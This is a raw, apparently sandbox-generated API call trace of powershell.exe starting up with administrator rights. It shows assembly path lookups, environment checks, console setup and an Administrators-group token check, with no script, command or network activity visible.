	[0474.867] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3af1d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0474.867] CoTaskMemFree (pv=0x3af1d0) 
	[0478.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0478.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0480.381] CoTaskMemAlloc (cb=0x104) returned 0x3b4aa0
	[0480.381] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0480.381] CoTaskMemFree (pv=0x3b4aa0) 
	[0480.382] CoTaskMemAlloc (cb=0x104) returned 0x3b4aa0
	[0480.382] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0480.382] CoTaskMemFree (pv=0x3b4aa0) 
	[0480.420] CoTaskMemAlloc (cb=0x104) returned 0x3b5bd0
	[0480.420] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b5bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0480.420] CoTaskMemFree (pv=0x3b5bd0) 
	[0481.405] CoTaskMemAlloc (cb=0x104) returned 0x319380
	[0481.405] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x319380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.405] CoTaskMemFree (pv=0x319380) 
	[0481.406] CoTaskMemAlloc (cb=0x104) returned 0x319380
	[0481.406] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x319380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.406] CoTaskMemFree (pv=0x319380) 
	[0483.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0483.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0483.989] CoTaskMemAlloc (cb=0x104) returned 0x3b9ed0
	[0483.989] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b9ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0483.989] CoTaskMemFree (pv=0x3b9ed0) 
	[0483.992] CoTaskMemAlloc (cb=0x104) returned 0x3b9ed0
	[0483.992] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b9ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0483.992] CoTaskMemFree (pv=0x3b9ed0) 
	[0485.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0485.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0490.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0492.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0492.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0494.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0494.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0497.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0497.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0498.096] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0498.096] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0498.096] CoTaskMemFree (pv=0x3ba680) 
	[0498.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0498.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0498.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0498.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0499.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x12d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0499.500] SetErrorMode (uMode=0x1) returned 0x1
	[0499.500] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x12d820 | out: lpFileInformation=0x12d820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0499.500] SetErrorMode (uMode=0x1) returned 0x1
	[0501.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0501.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0501.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0501.487] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0501.487] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.488] CoTaskMemFree (pv=0x3ba680) 
	[0501.491] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0501.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.491] CoTaskMemFree (pv=0x3ba680) 
	[0501.491] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0501.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.491] CoTaskMemFree (pv=0x3ba680) 
	[0501.494] CoCreateGuid (in: pguid=0x12dbe8 | out: pguid=0x12dbe8*(Data1=0xb1d7907c, Data2=0x929f, Data3=0x44b1, Data4=([0]=0x8a, [1]=0xf5, [2]=0x4b, [3]=0x26, [4]=0x16, [5]=0x65, [6]=0xab, [7]=0xb5))) returned 0x0
	[0502.246] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0502.246] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0502.246] CoTaskMemFree (pv=0x3ba680) 
	[0502.248] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0502.248] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0502.249] CoTaskMemFree (pv=0x3ba680) 
	[0502.250] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0502.251] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0502.251] CoTaskMemFree (pv=0x3ba680) 
	[0502.256] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0502.258] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x12d890 | out: lpConsoleScreenBufferInfo=0x12d890) returned 1
	[0502.265] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0502.265] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x12d890 | out: lpConsoleScreenBufferInfo=0x12d890) returned 1
	[0502.269] GetCurrentProcess () returned 0xffffffffffffffff
	[0502.270] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x12d8b8 | out: TokenHandle=0x12d8b8*=0x310) returned 1
	[0502.272] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12d7d8 | out: TokenInformation=0x0, ReturnLength=0x12d7d8) returned 0
	[0502.273] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3689d0
	[0502.273] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x8, TokenInformation=0x3689d0, TokenInformationLength=0x4, ReturnLength=0x12d7d8 | out: TokenInformation=0x3689d0, ReturnLength=0x12d7d8) returned 1
	[0502.274] DuplicateTokenEx (in: hExistingToken=0x310, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x12d938 | out: phNewToken=0x12d938*=0x30c) returned 1
	[0502.274] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12d7d8 | out: TokenInformation=0x0, ReturnLength=0x12d7d8) returned 0
	[0502.274] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3689a0
	[0502.274] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x8, TokenInformation=0x3689a0, TokenInformationLength=0x4, ReturnLength=0x12d7d8 | out: TokenInformation=0x3689a0, ReturnLength=0x12d7d8) returned 1
	[0502.275] CheckTokenMembership (in: TokenHandle=0x30c, SidToCheck=0x2d6f4e8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x12d948 | out: IsMember=0x12d948) returned 1
	[0502.275] CloseHandle (hObject=0x30c) returned 1
	[0502.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0502.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0502.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0502.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0502.970] CoTaskMemAlloc (cb=0x804) returned 0x3ce960
	[0502.970] GetConsoleTitleW (in: lpConsoleTitle=0x3ce960, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0502.970] CoTaskMemFree (pv=0x3ce960) 
	[0502.994] CoTaskMemAlloc (cb=0x804) returned 0x1b79a310
	[0502.994] GetConsoleTitleW (in: lpConsoleTitle=0x1b79a310, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0502.994] CoTaskMemFree (pv=0x1b79a310) 
	[0502.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0502.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0502.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0502.997] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0506.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0507.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0507.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0507.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0507.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0507.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0507.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0507.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
